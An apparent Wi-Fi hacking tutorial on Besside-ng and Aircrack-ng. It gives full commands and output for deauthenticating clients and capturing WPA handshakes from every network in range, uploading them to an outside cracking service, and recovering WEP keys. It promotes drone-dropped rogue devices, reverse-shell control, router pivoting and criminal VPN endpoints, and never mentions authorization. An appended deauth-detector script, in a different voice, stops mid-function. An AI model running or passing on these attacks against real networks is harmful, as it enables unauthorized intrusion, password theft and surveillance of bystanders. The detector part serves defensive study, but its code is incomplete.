Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special dependencies and can be run via SSH, making it easy to deploy remotely.
In my opinion, it's one of the most powerful Wi-Fi hacking tools currently available. First written in 2010 in C, Besside-ng is an incredibly aggressive and persistent WPA handshake mass-harvester and WEP cracker. It features customizable options to upload handshakes to distributed WPA password crackers, which, on average, crack over 18% of networks submitted automatically.
Encrypted Wi-Fi networks come in two primary flavors, WEP and WPA.
While WEP can be broken easily, WPA and WPA2 networks require us to record a "handshake" when a device connects to the target network. Then, we try to guess the password by having a program try many possible passwords against that recorded handshake. If we guess the correct password, we'll know, so having a good password list and a fast processor used to be essential to cracking WPA networks.
In 2020, we have more options. To save time, we can submit these handshakes to a distributed cracking service or a more powerful machine, which will automatically try all of the world's most common and shitty passwords for us. Since many people choose bad passwords, we will get back cracked passwords for around 10–20% of the networks whose handshakes we recorded.
To record a precious handshake from a Wi-Fi network, an authorized device like the target's smartphone or laptop must connect to the network. Besside-ng scans the airwaves for any devices connected to a Wi-Fi network, then injects a packet that disconnects the device from that network for a brief moment.
The targeted device will reconnect automatically, and we will record the handshake when it does. It's terrifyingly easy, and during peak activity hours in a high-density area, Besside-ng can harvest every Wi-Fi network in use within the range of your antenna. Keep in mind, if your target has an always-connected smart device, you can pretty much always grab a handshake for their network.
Since 2010, some significant changes have made Besside-ng relevant again. Small, cheap computers like the Raspberry Pi Zero W and the Raspberry Pi 3 can take powerful external network adapters in addition to their internal Wi-Fi cards, all while keeping the cost of a remote headless attack suite below $70.
So what kind of applications can we use Besside-ng for? Well, lots. But let's just go over a few of the best use-cases quickly so you get an idea.
Cheap, "fire-and-forget" cyberweapons, designed to harvest and crack WPA networks in a given area and then be discarded, are small and light enough to be left in an Altoids tin in the trash, dropped by a small drone on a roof, or tossed over a fence by hand. The same devices can also be used to deliberately jam or attempt to exploit the router of any nearby Wi-Fi network with a bad password.
An attacker would only need a directional antenna (like this one) aimed at the rogue device to communicate with and control it. The rapid way in which Besside-ng builds a list of available Wi-Fi connections to switch between allows a rogue device to develop a "beachhead" into the neighboring wireless environment. This doubles as a list of exploitable routers to pivot through once the WPA password is cracked. Once a rogue device is in place and cracks a few reliable networks, the hacker is free to go home and control the device via a reverse shell.
Emergency set up of workstations when rapidly shifting locations can be aided by using Besside-ng to acquire several connection options in under an hour. A small team needing to rapidly set up an internet-connected forward operating position in an opportunistic workspace (like working out of a garage or public space) can piggyback off existing nearby infrastructure to reduce their footprint.
While it's easy to get access, it is critical to use Tor or VPNs properly, and spin the MAC address of any devices used each time they connect to such a network. If you need a network — any network — to get working, this is your program. This technique can also be used to quickly set up an environment for rogue devices to operate in, allow for a LAN dead drop between two users over a privately owned network, or impersonate users of nearby networks to mask activity.
Setups using kismet drones or other "flytrap-like" methods of electronic surveillance are a great way to avoid having to drop an evil Pi from a drone — or even be anywhere near your target after the initial exploit.
The opportunistic nature of Besside-ng allows it to build up a steady list of routers for a hacker to attempt to exploit. Once a router is successfully compromised, custom router firmware can convert a nearby neighbor's router into a device to spy on a third party's Wi-Fi usage or forward interesting packets. Criminal hackers even leave behind VPN endpoints in exploited routers to provide cover for committing crimes, framing the target, or charging other criminals to use the VPN network.
To show off some of the techniques above, we'll go over an applied scenario of using Besside-ng. However, you can follow along on any Kali Linux device or virtual machine.
Our training mission will be to provide Wi-Fi coverage to support an operation in a targeted building. Doing so allows the placement and operation of a small improvised rogue device called a Buck-Eye, a Kali-based Wi-Fi-connected surveillance camera running on a Raspberry Pi Zero W.
Placing a device like this allows us to do useful things like conduct visual and electronic surveillance of an area, extend VoIP coverage to places where cellular coverage may be blocked, pivot deeper into targeted systems, and perform other helpful functions.
To be controlled, the device must be connected to a Wi-Fi network. After it's placed, you can control it from your long-range connection until you can migrate it to a nearby cracked network. We'll be running Besside-ng via SSH on the Buck-Eye once it is placed to grab a nearby network password.
Since our Buck-Eye runs Kali Linux, Besside-ng can ensure tactical network availability by scanning for and helping to build a list of backdoor Wi-Fi connections to spider through to ensure survivability in the event a primary Wi-Fi connection goes down.
Besside-ng runs on Kali Linux and is particularly effective on the Raspberry Pi 3 or Pi Zero W. You'll need the Aircrack-ng suite to run the attack, and your Kali system should be updated by running apt update.
I'll be using a Raspberry Pi running Kali Linux. But the tool will work on any Kali Linux system — here are a few builds we recommend:
- On a Raspberry Pi 3 running Kali Linux, directly or via SSH.
- On a Raspberry Pi Zero W running Kali Linux.
- On a virtual machine running Kali Linux.
- On a live USB or another temporary install of Kali Linux.
Our Kali Linux build is the easiest way to get started. For hardware, the only real requirement is a wireless network adapter capable of packet injection. (It should be noted that our testing has found bugs when using the Atheros AR9271 chipset.)
In our demonstration, I will be connected to our Raspberry Pi build running Kali Linux via SSH, but this will work the same on any Kali install. First, let's make sure we have the Aircrack-ng suite updated. Type man aircrack-ng to check if it already exists on the system.
~$ man aircrack-ng

AIRCRACK-NG(1)               General Commands Manual              AIRCRACK-NG(1)

NAME
       aircrack-ng - a 802.11 WEP / WPA-PSK key cracker

SYNOPSIS
       aircrack-ng [options] <input file(s)>

DESCRIPTION
       aircrack-ng is an 802.11 WEP, 802.11i WPA/WPA2, and 802.11w WPA2 key
       cracking program. It can recover the WEP key once enough encrypted
       packets have been captured with airodump-ng. This part of the
       aircrack-ng suite determines the WEP key using two fundamental methods.
       The first method is via the PTW approach (Pyshkin, Tews, Weinmann). The
       main advantage of the PTW approach is that very few data packets are
       required to crack the WEP key. The second method is the FMS/KoreK
       method. The FMS/KoreK method incorporates various statistical attacks
       to discover the WEP key and uses these in combination with brute
       forcing. Additionally, the program offers a dictionary method for
       determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a
       wordlist (file or stdin) or an airolib-ng has to be used.

INPUT FILES
       Capture files (.cap, .pcap), IVS (.ivs) or Hashcat HCCAPX files (.hccapx)

OPTIONS
       Common options:

       -a <amode>
              Force the attack mode: 1 or wep for WEP (802.11) and 2 or wpa
              for WPA/WPA2 PSK (802.11i and 802.11w).

       -e <essid>
              Select the target network based on the ESSID. This option is
              also required for WPA cracking if the SSID is cloaked. For SSID
              containing special characters, see
              https://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_single_quote_etc_in_ap_names

       -b <bssid> or --bssid <bssid>
              Select the target network based on the access point MAC address.

       -p <nbcpu>
              Set this option to the number of CPUs to use (only available on
              SMP systems) for cracking the key/passphrase. By default, it
              uses all available CPUs

       -q     If set, no status information is displayed.

       -C <macs> or --combine <macs>
              Merges all those APs MAC (separated by a comma) into a virtual
              one.

       -l <file>
              Write the key into a file. Overwrites the file if it already
              exists.

       Static WEP cracking options:

       -c     Search alpha-numeric characters only.

       -t     Search binary coded decimal characters only.

       -h     Search the numeric key for Fritz!BOX

       -d <mask> or --debug <mask>
              Specify mask of the key. For example: A1:XX:CF

       -m <maddr>
              Only keep the IVs coming from packets that match this MAC
              address. Alternatively, use -m ff:ff:ff:ff:ff:ff to use all and
              every IVs, regardless of the network (this disables ESSID and
              BSSID filtering).

       -n <nbits>
              Specify the length of the key: 64 for 40-bit WEP, 128 for
              104-bit WEP, etc., until 512 bits of length. The default value
              is 128.

       -i <index>
              Only keep the IVs that have this key index (1 to 4). The default
              behavior is to ignore the key index in the packet, and use the
              IV regardless.

       -f <fudge>
              By default, this parameter is set to 2. Use a higher value to
              increase the bruteforce level: cracking will take more time,
              but with a higher likelihood of success.

       -k <korek>
              There are 17 KoreK attacks. Sometimes one attack creates a huge
              false positive that prevents the key from being found, even
              with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each
              attack selectively.

       -x or -x0
              Disable last keybytes bruteforce (not advised).

       -x1    Enable last keybyte bruteforcing (default)

       -x2    Enable last two keybytes bruteforcing.

       -X     Disable bruteforce multithreading (SMP only).

       -s     Shows ASCII version of the key at the right of the screen.

       -y     This is an experimental single brute-force attack which should
              only be used when the standard attack mode fails with more than
              one million IVs.

       -z     Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann)
              attack (default attack).

       -P <num> or --ptw-debug <num>
              PTW debug: 1 Disable klein, 2 PTW.

       -K     Use KoreK attacks instead of PTW.

       -D or --wep-decloak
              WEP decloak mode.

       -1 or --oneshot
              Run only 1 try to crack key with PTW.

       -M <num>

       -V or --visual-inspection
              Run in visual inspection mode. Can only be used when using
              KoreK.

       WEP and WPA-PSK cracking options

       -w <words>
              Path to a dictionary file for wpa cracking. Separate filenames
              with comma when using multiple dictionaries. Specify "-" to use
              stdin. Here is a list of wordlists:
              https://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
              In order to use a dictionary with hexadecimal values, prefix
              the dictionary with "h:". Each byte in each key must be
              separated by ':'. When using with WEP, key length should be
              specified using -n.

       -N <file> or --new-session <file>
              Create a new cracking session. It allows one to interrupt
              cracking session and restart at a later time (using -R or
              --restore-session). Status files are saved every 5 minutes. It
              does not overwrite existing session file.

       -R <file> or --restore-session <file>
              Restore and continue a previously saved cracking session. This
              parameter is to be used alone, no other parameter should be
              specified when starting aircrack-ng (all the required
              information is in the session file).

       WPA-PSK options:

       -E <file>
              Create Elcomsoft Wireless Security Auditor (EWSA) Project file
              v3.02.

       -j <file>
              Create Hashcat v3.6+ Capture file (HCCAPX).

       -J <file>
              Create Hashcat Capture file (HCCAP).

       -S     WPA cracking speed test.

       -Z <sec>
              WPA cracking speed test execution length in seconds.

       -r <database>
              Path to the airolib-ng database. Cannot be used with '-w'.

       SIMD selection:

       --simd=<option>
              Aircrack-ng automatically loads and uses the fastest
              optimization based on instructions available for your CPU. This
              options allows one to force another optimization. Choices
              depend on the CPU and the following are all the possibilities
              that may be compiled regardless of the CPU type: generic, sse2,
              avx, avx2, avx512, neon, asimd, altivec, power8.

       --simd-list
              Shows a list of the available SIMD architectures, separated by
              a space character. Aircrack-ng automatically selects the
              fastest optimization and thus it is rarely needed to use this
              option. Use case would be for testing purposes or when a
              "lower" optimization, such as "generic", is faster than the
              automatically selected one. Before forcing a SIMD architecture,
              verify that the instruction is supported by your CPU, using -u.

       Other options:

       -H or --help
              Show help screen

       -u or --cpu-detect
              Provide information on the number of CPUs and SIMD support

AUTHOR
       This manual page was written by Adam Cecile <email@example.com> for the
       Debian system (but may be used by others). Permission is granted to
       copy, distribute and/or modify this document under the terms of the
       GNU General Public License, Version 2 or any later version published
       by the Free Software Foundation On Debian systems, the complete text
       of the GNU General Public License can be found in
       /usr/share/common-licenses/GPL.

SEE ALSO
       airbase-ng(8) aireplay-ng(8) airmon-ng(8) airodump-ng(8)
       airodump-ng-oui-update(8) airserv-ng(8) airtun-ng(8) besside-ng(8)
       easside-ng(8) tkiptun-ng(8) wesside-ng(8) airdecap-ng(1)
       airdecloak-ng(1) airolib-ng(1) besside-ng-crawler(1) buddy-ng(1)
       ivstools(1) kstats(1) makeivs-ng(1) packetforge-ng(1) wpaclean(1)
       airventriloquist(8)

Version 1.6.0                     January 2020                    AIRCRACK-NG(1)
If not, or if we want to make sure it's updated, let's run the following command.
~$ sudo apt install aircrack-ng
Reading package lists... Done
Building dependency tree
Reading state information... Done
aircrack-ng is already the newest version (1:1.6-4).
aircrack-ng set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Once we confirm we have the suite and it's updated, we can proceed with the attack.
On Kali Linux, you can type iwconfig to see a list of available antennas. If you are connecting to your Kali Linux device remotely via SSH or VNC, now is a great time to note which antenna is hosting your data connection (the one with the IP address assigned).
Starting Besside-ng on the wrong antenna will instantly sever your remote connection and lock you out of the device until you restart if you are connected via SSH. Here we see my attack antenna is idle while my command and control antenna is attached to a network.
~$ sudo iwconfig

wlan0     IEEE 802.11bgn  ESSID:"████████████████████"
          Mode:Managed  Frequency:2.462 GHz  Access Point: ████████████████████
          Bit Rate=72 Mb/s   Tx-Power=1496 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on
          Link Quality=60/70  Signal level=50 dBm
          Rx invalid nvid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

lo        no wireless extensions.

eth0      no wireless extensions.

wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=1496 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
If you are not on Kali, you can run ifconfig to see attached antennas and look for "wlan" to spot the wireless antennas. In this case, wlan1 is my attack antenna.
Besside-ng is dead simple. To learn more about it, visit its man page.
~$ man besside-ng

BESSIDE-NG(8)                System Manager's Manual               BESSIDE-NG(8)

NAME
       besside-ng - crack a WEP or WPA key without user intervention and
       collaborate with WPA cracking statistics

SYNOPSIS
       besside-ng [options] <interface>

DESCRIPTION
       besside-ng is a tool which will crack all the WEP networks in range and
       log all the WPA handshakes. WPA handshakes can be uploaded to the
       online cracking service at wpa.darkircop.org. Wpa.darkircop.com also
       provides useful statistics based on user-submitted capture files about
       the feasibility of WPA cracking.

       -b <target mac>
              Specifies the target's BSSID

       -s <WPA server>
              Where to upload capture file for cracking. A good choice is
              wpa.darkircop.org

       -c <chan>
              Channel lock

       -p <pps>
              Packages per second to send (flood rate).

       -W     Crack only WPA networks

       -v     Verbose mode. Use -vv for more verbose, -vv for even more and
              so on.

       -h     Help screen

AUTHOR
       This manual page was written by David Francos Cuartero. Permission is
       granted to copy, distribute and/or modify this document under the
       terms of the GNU General Public License, Version 2 or any later version
       published by the Free Software Foundation On Debian systems, the
       complete text of the GNU General Public License can be found in
       /usr/share/common-licenses/GPL.

SEE ALSO
       airbase-ng(8) aireplay-ng(8) airmon-ng(8) airodump-ng(8)
       airodump-ng-oui-update(8) airserv-ng(8) airtun-ng(8) easside-ng(8)
       tkiptun-ng(8) wesside-ng(8) aircrack-ng(1) airdecap-ng(1)
       airdecloak-ng(1) airolib-ng(1) besside-ng-crawler(1) buddy-ng(1)
       ivstools(1) kstats(1) makeivs-ng(1) packetforge-ng(1) wpaclean(1)
       airventriloquist(8)

Version 1.6.0                     January 2020                     BESSIDE-NG(8)
With the attack antenna known as wlan1, simply type the following command to initiate a wide-area attack against all detected APs. While it helps to put an adapter in monitor mode, Besside-ng will take care of that.
~$ sudo besside-ng wlan1 -vv

[10:07:47] mac ██:██:██:██:██:██
[10:07:47] Let's ride
[10:07:47] Resuming from besside-ng
[10:07:47] Found AP ████████████████ [██████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [██████████████] chan 0 crypto WPA dbm 0
[10:07:47] Appending to wpa.cap
[10:07:47] Appemding to wep.cap
[10:07:47] Logging to besside.log
[10:07:47] Found AP ████████████████ [██████] chan 1 crypto WPA dbm -01
[10:07:47] Found AP ████████████████ [██████] chan 2 crypto WPA dbm -04
[10:07:47] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -06
[10:07:47] Found AP ████████████████ [██████████████████] chan 1 crypto WPA dbm -00
[10:07:48] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -56
[10:07:48] Found AP ████████████████ [██████████] chan 4 crypto WPA dbm -79
[10:07:49] Found AP ████████████████ [████████████] chan 7 crypto WPA dbm -50
[10:07:50] Found AP ████████████████ [████] chan 9 crypto WPA dbm -49
[10:07:50] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -83
[10:07:51] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -72
[10:07:51] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -59
[10:07:52] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -63
[10:07:52] Found AP ████████████████ [████] chan 4 crypto WPA dbm -53
[10:07:53] Found AP ████████████████ [████████████████] chan 6 crypto WPA dbm -65
[10:07:53] Found AP ████████████████ [██████████████████████] chan 7 crypto WPA dbm -66
[10:07:54] - Scanning chan 11
Shit will proceed to hit the fan, with the script automatically throwing the wireless card into monitor mode and scanning all channels for targets. On the first run or two, you may get a "no child process" error. Just run the sudo besside-ng wlan1 command again, and it will start. To see everything the script is doing, add the -vv argument at the end. You'll see the blistering speed at which Besside-ng finds, prioritizes, pings, and attacks networks.
In a target-rich environment, Besside-ng will run continuously for days or weeks, with my current endurance record over one week of continuous attacking. While the attack runs, it will prioritize WEP networks as they can be wholly compromised from within the script. As such, Besside-ng may focus too heavily on WEP and slow down the attack. You can prevent this by only attacking WPA networks by adding the -W argument to the command, as the help page suggests.
~$ sudo besside-ng -h

Besside-ng 1.6 - (C) 2010 Andrea Bittau
https://www.aircrack-ng.org

Usage: besside-ng [options] <interface>

Options:

       -b <victim mac>       : Victim BSSID
       -R <victim ap regex>  : Victim ESSID regex
       -s <WPA server>       : Upload wpa.cap for cracking
       -c <chan>             : chanlock
       -p <pps>              : flood rate
       -W                    : WPA only
       -v                    : verbose, -vv for more, etc.
       -h                    : This help screen
This script will, by default, scan all channels, which makes it too slow to capture handshakes while wardriving (see null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/), since by the time the master list of APs to attack is built and prioritized, you're a block away.
This can be mitigated in part by adding the -c argument followed by a channel number to stay locked on. Doing so builds the target list much more quickly, at the expense of only attacking one channel. Run Airodump-ng to determine the best channels to lock to.
If you wish to attack a particular network, you can add the -b argument followed by the BSSID of the target to specify which access point you want to attack. This is useful for extended service sets, where many identically named APs all appear as the same Wi-Fi network. Adding this argument allows you to focus your attack on a particular AP under the umbrella of the network and make faster progress on cracking a WEP key.
Soon, you will begin to gather WPA handshakes, potentially a lot of them. They will be automatically appended to the wpa.cap file, which is created in your home directory if it doesn't already exist. WEP packets are similarly saved to a file called wep.cap, both of which can be run in Aircrack-ng to attempt to get the password.
[10:52:55] Crappy connection - ████████ unreachable got 0/10 (100% loss) [-85 dbm]
[10:53:12] Got necessary WFA handshake info for ████████
[10:53:12] Uploaded WPA handshake to wpa.darkircop.org
[10:53:12] Pwned network ████████ in 0:07 mins:secs
[10:53:12] TO-OWN [████████ ████████████████ ████████ ████ ████████████████████]
We can run these in Aircrack-ng against our own password list, but electricity is expensive, and brute-force attacks are very dull. Instead, we can use the -s argument to specify a WPA server to upload the handshakes. This will let a distributed service like wpa.darkircop.org crack the passwords for us.
If Besside-ng detects a WEP network in range, it will cyberbully the hell out of it. You can open a second terminal window and begin attacking a WEP network while Besside-ng collects the unique IVs that Aircrack-ng needs to crack the network.
In a terminal, select the network to attack by typing the following. A list of all WEP captures by Besside-ng will be displayed.
~$ sudo aircrack-ng ./wep.cap
Opening /Users/████████/web.cap
Read 75862 packets.

   #  BSSID              ESSID                      Encryption

   1  ████████████████   ████████████████           WEP (28122 IVs)
   2  ████████████████                              WEP (1012 IVs)
   3  ████████████████                              WPA (0 handshake)
   4  ████████████████                              WEP (108 IVs)
   5  ████████████████                              WEP (4 IVs)
   6  ████████████████                              WPA (0 handshake)
   7  ████████████████                              WPA (0 handshake)
   8  ████████████████                              WEP (7 IVs)
   9  ████████████████                              WPA (0 handshake)
  10  ████████████████                              WEP (7 IVs)
  11  ████████████████                              WPA (0 handshake)
  12  ████████████████                              WEP (6 IVs)
  13  ████████████████   ██████████████             WEP (6 IVs)
  14  ████████████████                              WEP (13 IVs)
  15  ████████████████   ███████████████            WEP (19984 IVs)
  16  ████████████████                              WEP (22 IVs)
  17  ████████████████   ████████████████           WEP (44 IVs)
  18  ████████████████   ████████████               WEP (20240 IVs)
  19  ████████████████                              WEP (12 IVs)
  20  ████████████████   ████████                   WEP (1 IVs)
  21  ████████████████                              WEP (1 IVs)
  22  ████████████████   ████████                   WEP (749 IVs)
  23  ████████████████   ████████                   WEP (105 IVs)
  24  ████████████████   ████████                   WEP (1 IVs)
  25  ████████████████   ████████████████           WEP (1578 IVs)
  26  ████████████████                              WEP (9 IVs)
  27  ████████████████   ███████████████████        WEP (7 IVs)
  28  ████████████████   ██████████████████         WEP (1 IVs)
  29  ████████████████   ██████████████             WEP (2 IVs)
  30  ████████████████   ████████████████           WEP (3 IVs)
  31  ████████████████   ████████                   WEP (3052 IVs)
  32  ████████████████   ██████                     WEP (4 IVs)

Index number of target networks ?
Select the index number of the network to attack, and a beautiful symphony of math ensues as Aircrack-ng attacks the encryption.
Index number of target networks ? 18

                                 Aircrack-ng 1.2 rc4

                 [00:00:07] Tested 794881 keys (got 25521 IVs)

   KB    depth   byte(vote)
    0    0/  1   21(38912) AC(34560) 5B(32768) 1F(31744) C8(31744) 0D(30976) 63(30976) 8C(30976) 82(30720) 09(30464) 69(30464) A0(30464) FC(30464)
    1    2/  3   78(32000) F5(31744) FE(30976) 06(30464) 3E(30464) 9F(30464) AC(30464) C6(30464) D2(30464) 38(30208) 43(30208) 4D(30208) 1C(22952)
    2    0/  1   FB(36352) 33(32768) 0F(32256) 37(31744) 2D(30976) DA(30720) 0D(30208) 61(30208) 9E(30208) AD(30208) C5(30208) F9(30208) 45(29952)
    3    1/  2   4D(34304) A0(32512) 18(31744) 81(30406) C7(30464) F9(30464) 87(30208) 99(30208) A6(30208) D1(30208) F1(30208) 2B(29952) 5B(29952)
    4    1/  2   37(34304) EB(32256) C5(31488) AA(30720) EE(30208) FA(30208) 4A(29952) B3(29952) A7(29696) 61(29440) D0(29184) DB(21184) ED(28928)
    5    5/  6   D4(31488) 8F(30976) EE(30720) 3C(30208) 7D(30208) C4(30208) 77(29952) B8(29952) 5A(29696) B3(29440) 1C(29184) 61(29184) 82(29184)
    6    3/  4   D5(31488) 96(30976) 2B(30208) 90(30208) 6B(30464) AB(30464) CE(30208) F0(30208) FE(30208) 1D(29696) 33(29696) 39(29696) B8(29696)
    7   14/ 15   F6(30208) C3(29952) E0(29952) 4A(29696) AF(29696) 32(29440) 50(29440) 31(29184) 7A(29184) B6(29184) BE(29184) EE(29184) 2E(28928)
    8    3/  4   70(30976) 6B(30720) 47(30464) DF(30464) 1F(30208) 32(30208) 7F(30208) 9F(30208) B7(30208) 9C(29696) BF(29696) C3(29696) FF(26969)
    9    0/  1   AB(33536) 1F(31488) 23(31488) C6(31488) 6D(31232) BD(31232) D8(31232) 63(30976) 60(30720) 16(30464) 59(30464) A5(30208) 05(29952)
   10    4/  8   19(31232) 39(30976) E4(30976) FA(30976) 0F(30464) 44(30464) D3(30464) A2(30208) A6(29952) 09(29696) 25(29696) 50(29696) 54(29696)
   11    2/  3   C7(32000) E5(30976) 45(30464) 87(30464) F7(30464) E9(30208) 0B(29952) 41(29952) AD(29952) 31(29696) 42(29696) 9A(29696) D9(29696)
   12    1/  2   37(32256) FD(31744) 8E(31232) E7(30720) FA(30720) 68(30464) D1(30208) 45(29952) 4F(29952) 5D(29952) 65(29952) 09(29696) 39(29696)
Aircrack-ng will re-try the attack automatically every 5,000 IVs as more packets are captured by Besside-ng.
   KB    depth   byte(vote)
    0    7/  8   99(5120) D4(4864) 00(4864) 8B(4864) 07(4864) FB(4864) 11(4864) 03(4608) EC(4608) 17(4608) 18(4608) E6(4608) D9(4608)
    1   10/ 14   B2(4864) 6D(4608) 99(4608) 05(4608) A9(4352) 91(4352) 95(4352) B4(4352) 1B(4352) A7(4352) DC(4096) 1D(4096) FC(4096)
    2   14/ 15   2D(4608) D6(4352) BD(4352) CF(4352) 0D(4352) 10(4352) 86(4352) B2(4352) B1(4352) FF(4352) 79(4096) D4(4096) 03(4096)
    3   15/  3   07(4352) 4E(4352) DB(4352) 09(4352) 58(4352) 6D(4096) 25(4096) 0F(4096) 44(4096) 8B(4096) 15(4096) 85(4096) EA(4096)
    4   17/  4   95(4352) 72(4352) CC(4352) 55(4352) C2(4096) 19(4096) 2D(4096) 2F(4096) 33(4096) FF(4096) 05(4096) 07(4096) F2(4096)

Failed. Next try with 5000 IVs.
This repeats until we defeat the encryption and gain the key.
   KB    depth   byte(vote)
    0    0/ 15   21(26112) E1(25600) F9(25088) B9(24832) BA(24576) A2(24320) 19(24320) 10(24064) 63(23808) DA(23552) 8C(23552) BD(23552) ED(23552)
    1   11/ 14   BA(24064) 95(23808) 59(23808) 16(23552) 62(23552) 0A(23552) 72(23552) B7(23552) 43(23552) 68(23552) A3(23552) 9D(23552) E5(23296)
    2    0/  3   20(28416) 7A(26624) 91(25856) D4(25344) 2C(25344) DC(25088) 43(25088) 0D(24832) B3(24832) 07(24832) A7(24576) 28(24064) 9A(24064)
    3    0/  1   44(32256) 1C(25856) 82(25600) C0(25088) 2B(24832) 06(24832) 7E(24576) BF(24320) 04(24320) D6(24320) 54(24064) 31(24064) A9(24064)
    4    1/ 25   00(25344) 7C(25088) 45(24832) E9(24832) 36(24832) 6C(24576) AF(24320) 25(24064) 17(23808) 3B(23808) 8C(23552) A1(23296) 4F(23296)

                         KEY FOUND! [ ████████████████ ] (ASCII: █████████ )
        Decrypted correctly: 100%
Besside-ng experiences two main types of glitches — "no child process" and "network is down." These can be related to your wireless network adapter.
No child process can be fixed by re-running the Besside-ng command, most of the time. Network is down is often caused by the WPA supplicant process throwing your card out of monitor mode. To solve this problem, you can run Airmon-ng:
~$ sudo airmon-ng check kill
This will kill any troublesome processes for monitor mode, but it will also kill any other Wi-Fi interfaces, so be careful if you are SSHed into your device that way.
Besside-ng is not the only tool to target this niche. Suites like Wifite can also be used to attack WPA and WEP networks in automated ways. Wifite includes the added function of attacking WPS setup PINs.
While Wifite certainly provides better situational awareness of wireless targets around you, not everyone has time to wait to hit each network with every attack in the book, as Wifite likes to do. In addition, the WPS setup PIN attack is aging poorly and often no longer works, which wastes a lot of time. These attacks focus on different types of automation, with Wifite throwing everything and the kitchen sink at a particular network or networks, and Besside-ng going ham over any networks that dare exist nearby.
The problem with Wifite is that it sucks because it takes forever, and I rarely have success with it nowadays. By comparison, Besside-ng remains blisteringly fast into the foreseeable future.
While Besside-ng is a phenomenal tool, the nature of the attack means it interacts with every access point in range. This leaves distinctive logs in each router targeted, meaning this attack has the subtlety of running around and smacking every device off of every Wi-Fi connection in range. It can be mitigated by focusing your attack on a particular AP. The technique usually does not disrupt regular network use and operation, but can reveal your device MAC address or physical location if run against a well-defended target.
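The deauthentication burst that forces the reconnect described earlier, repeated against every AP in range, is exactly what gives the attack away to anyone watching the air. The detector below is an added example, not code from the Aircrack-ng project or this article: it parses raw 802.11 management frames, counts deauthentication and disassociation frames per BSSID inside a sliding time window, and reports any BSSID that crosses a threshold, noting whether broadcast deauths were seen. All MAC addresses, timestamps and reason codes in the embedded sample are constructed.

```python
"""Deauthentication-burst detector for 802.11 monitor-mode captures.
Added example, not Aircrack-ng code; the sample frames below are constructed."""
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH = 12     # 802.11 management subtype: deauthentication
DISASSOC = 10   # 802.11 management subtype: disassociation
BEACON = 8      # 802.11 management subtype: beacon (benign background traffic)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, reason=None) -> bytes:
    """Build a minimal 802.11 management frame (no radiotap header, no FCS):
    frame control, duration, addr1/addr2/addr3, sequence control, optional reason."""
    fc = bytes([subtype << 4, 0x00])            # low bits: type 0 = management
    frame = (fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src)
             + mac_bytes(bssid) + b"\x00\x00")
    if reason is not None:
        frame += reason.to_bytes(2, "little")  # reason code is little-endian
    return frame


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame,
    or None for anything too short or not of type management."""
    if len(frame) < 24:
        return None
    ftype = (frame[0] >> 2) & 0x3
    subtype = (frame[0] >> 4) & 0xF
    if ftype != 0:
        return None
    addr1 = frame[4:10].hex(":")     # receiver (client, or broadcast)
    addr2 = frame[10:16].hex(":")    # transmitter (spoofed as the AP in an attack)
    addr3 = frame[16:22].hex(":")    # BSSID
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = int.from_bytes(frame[24:26], "little")
    return subtype, addr1, addr2, addr3, reason


def detect_deauth_bursts(frames, window=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame), in time order.
    Counts deauth/disassoc frames per BSSID within `window` seconds and returns
    one alert dict per BSSID whose count reached `threshold`."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _subtype, addr1, _addr2, bssid, reason = parsed
        q = recent[bssid]
        q.append((ts, addr1 == BROADCAST, reason))
        while q and ts - q[0][0] > window:       # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(bssid, {"bssid": bssid, "start": q[0][0],
                                          "count": 0, "broadcast": False,
                                          "reasons": set()})
            a["count"] = max(a["count"], len(q))
            a["end"] = ts
            a["broadcast"] = a["broadcast"] or any(b for _, b, _ in q)
            a["reasons"].update(r for _, _, r in q if r is not None)
    return list(alerts.values())


# Constructed sample (locally administered MACs): one AP hit with eight
# deauths in under three seconds, the last two broadcast; one AP with a single
# ordinary deauth; beacons interleaved as background noise.
AP_ATTACKED = "02:00:00:00:00:aa"
AP_QUIET = "02:00:00:00:00:bb"
CLIENT = "02:00:00:00:00:01"


def sample_frames():
    frames = []
    t = 100.0
    for i in range(8):
        dst = BROADCAST if i >= 6 else CLIENT
        frames.append((t + i * 0.4, build_mgmt_frame(DEAUTH, dst, AP_ATTACKED, AP_ATTACKED, reason=7)))
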